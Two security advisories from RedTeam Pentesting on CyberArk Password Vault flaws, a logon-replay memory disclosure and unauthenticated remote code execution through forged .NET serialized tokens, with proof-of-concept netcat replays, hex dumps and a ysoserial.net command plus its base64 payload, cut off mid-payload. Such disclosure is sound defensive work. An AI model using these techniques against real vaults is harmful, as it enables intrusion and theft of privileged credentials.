[FD] [RT-SA-2017-015] CyberArk Password Vault Memory Disclosure

[RedTeam Pentesting GmbH]

Advisory: CyberArk Password Vault Memory Disclosure

Data in the CyberArk Password Vault may be accessed through a proprietary
network protocol. While answering to a client's logon request, the vault
discloses around 50 bytes of its memory to the client.


Details
===

Product: CyberArk Password Vault
Affected Versions: < 9.7, < 10
Fixed Versions: 9.7, 10
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.cyberark.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015
Advisory Status: published
CVE: CVE-2018-9842
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9842


Introduction


"CyberArk Enterprise Password Vault is designed to secure, rotate and
control access to privileged account credentials based on organizational
policies. A flexible architecture allows organizations to start small
and scale to the largest, most complex IT environments. The solution
protects privileged account credentials used to access the vast majority
of systems."
(from the Enterprise Password Vault Data Sheet [1])


More Details


The CyberArk Password Vault serves as a database to securely store
credentials. Furthermore, the vault enforces access controls and logs
access to its records. Data stored in the vault may be accessed through
a proprietary network protocol which is usually transmitted over TCP
port 1858. Various clients, such as web applications or command line
tools, are provided by CyberArk to interface with a vault.

The first message a client sends to the vault is a "Logon" command.
Using a network sniffer, such a message was captured:

$ xxd logon.bin
:   f700    3d01   =...
0010: 5061 636c 6953 6372 6970 7455 7365 7200  PacliScriptUser.
0020:          
0030:          
0040:          
0050:          
0060:       0020 2020  .
0070: 20ff  ff00     0073   ..s
0080:  00ce cece ce00      
0090:    0030 3d4c 6f67 6f6e fd31  ...0=Logon.1
00a0: 3135 3d37 2e32 302e 3930 2e32 38fd 3639  15=7.20.90.28.69
00b0: 3d50 fd31 3136 3d30 fd31 3030 3dfd 3231  =P.116=0.100=.21
00c0: 373d 59fd 3231 383d 5041 434c 49fd 3231  7=Y.218=PACLI.21
00d0: 393d fd33 3137 3d30 fd33 3537 3d30 fd32  9=.317=0.357=0.2
00e0: 323d 5061 636c 6953 6372 6970 7455 7365  2=PacliScriptUse
00f0: 72fd 3336 373d 3330 fd00 00  r.367=30...

Starting at offset 0x97, a type of remote procedure call can be
identified. In this case, "Logon" is invoked for the user
"PacliScriptUser". This message does not contain any random,
unpredictable data. Therefore, it may be replayed at will once captured.
This can be accomplished using netcat:


$ cat logon.bin | nc -v 10.0.0.5 1858


RedTeam Pentesting discovered that the message sent by the vault in
response to a "Logon" command contains about 50 bytes of the vault's
memory.


Proof of Concept


To trigger the vulnerability, a previously captured logon message is
sent to the vault using netcat:


$ cat logon.bin | nc -v 10.0.0.5 1858 | xxd
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.5:1858.
Ncat: 251 bytes sent, 273 bytes received in 0.01 seconds.
: e500    3001  5061 636c  0...Pacl
0010: 6953 6372 6970 7455 7365 7200    iScriptUser.
0020:          
0030:          
0040:          
0050:          
0060:       001e 0200  
0070: 0078 9c53 6362 0003 7616 0686 ff40 e019  .x.Scb..v@..
0080: e2e8 ec6b 6069 eaaa 1052 9498 579c 985c  ...k`i...R..W..\
0090: 9299 9fa7 e093 9f0e 248b b333 0b0a 5253  $..3..RS
00a0: 14d2 f28b 144a 8b53 8b14 0212 9373 3283  .J.S.s2.
00b0: 938b 320b 4a42 817c 3d85 a0d4 c4e2 fc3c  ..2.JB.|=..<
00c0: 2b05 a070 6a5e 8942 717e 7276 6a89 4266  +..pj^.Bq~rvj.Bf
00d0: 3150 20bf 3835 458f 8b61 140c 15c0 08c4  1P .85E..a..
00e0: 0063 0e25 c06d 6265 7220 3d20 7661 756c  .c.%.mber = vaul
00f0: 745f 6669 6c65 5f63 6174 6567 6f72 6965  t_file_categorie
0100: 735f 7265 636f 7264 7300 2968 b8fb aae9  s_records.)h
0110: 62
---

[FD] [RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution

[RedTeam Pentesting GmbH]

Advisory: CyberArk Password Vault Web Access Remote Code Execution

The CyberArk Password Vault Web Access application uses authentication
tokens which consist of serialized .NET objects. By crafting manipulated
tokens, attackers are able to gain unauthenticated remote code execution
on the web server.


Details
===

Product: CyberArk Password Vault Web Access
Affected Versions: < 9.9.5, < 9.10, 10.1
Fixed Versions: 9.9.5, 9.10, 10.2
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: https://www.cyberark.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-014
Advisory Status: published
CVE: CVE-2018-9843
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843


Introduction


"CyberArk Enterprise Password Vault is designed to secure, rotate and
control access to privileged account credentials based on organizational
policies. A flexible architecture allows organizations to start small
and scale to the largest, most complex IT environments. The solution
protects privileged account credentials used to access the vast majority
of systems."
(from the Enterprise Password Vault Data Sheet [1])


More Details


The CyberArk Password Vault provides secure storage for credentials. It
may be accessed through various clients which are also provided by
CyberArk. One such client is the CyberArk Password Vault Web Access, a
.NET web application. After logging into the web application with their
credentials, users may access credentials kept in the vault.
Additionally, CyberArk Password Vault Web Access provides a REST API for
programmatic access to the vault. This API is available at an URL
similar to the following:

https://10.0.0.6/PasswordVault/WebServices/

The API provides multiple endpoints with different methods.
Most methods provided by the API require prior authentication.
Consequently, a user's API call must include an authentication token in
an HTTP authorization header. Tokens may be generated by calling a
dedicated "Logon" API method.

Analysis of this token by RedTeam Pentesting revealed, that it consists
of a base64 encoded, serialized .NET object of the type
"CyberArk.Services.Web.SessionIdentifiers".  This class consists of four
string attributes which hold information about a user's session. The
integrity of the serialized data is not protected. Therefore, attackers
may send arbitrary .NET objects to the API in the authorization header.
By leveraging certain gadgets, such as the ones provided by
ysoserial.net [2], attackers may execute arbitrary code in the context
of the web application.


Proof of Concept


First, a malicious serialized .NET object is created. Here the
"TypeConfuseDelegate" gadget of ysoserial.net is used to execute the
"ping" command:


$ ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 \
  -c "ping 10.0.0.19" > execute-ping.txt

$ cat execute-ping.txt
AAEAAAD/AQAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy
ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3Rl
bS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nv
cmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODldXQQFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwAD
AAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtb
U3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0
cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgIJAwIA
AAAJBAQDjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29t
cGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BC19j
b21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQURBAAA
AAIGBgAAABEvYyBwaW5nIDEwLjAuMC4xOQYHA2NtZAQFIlN5c3RlbS5EZWxl
Z2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDCERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMD
AzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lz
dGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJl
ZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAkJCQoE
CDBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkH
BHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBl
TmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl
cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLsAJTeXN0ZW0uRnVuY2AzW1tT
eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRy
YWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBt
c2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv
a2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lz
dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49
Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWI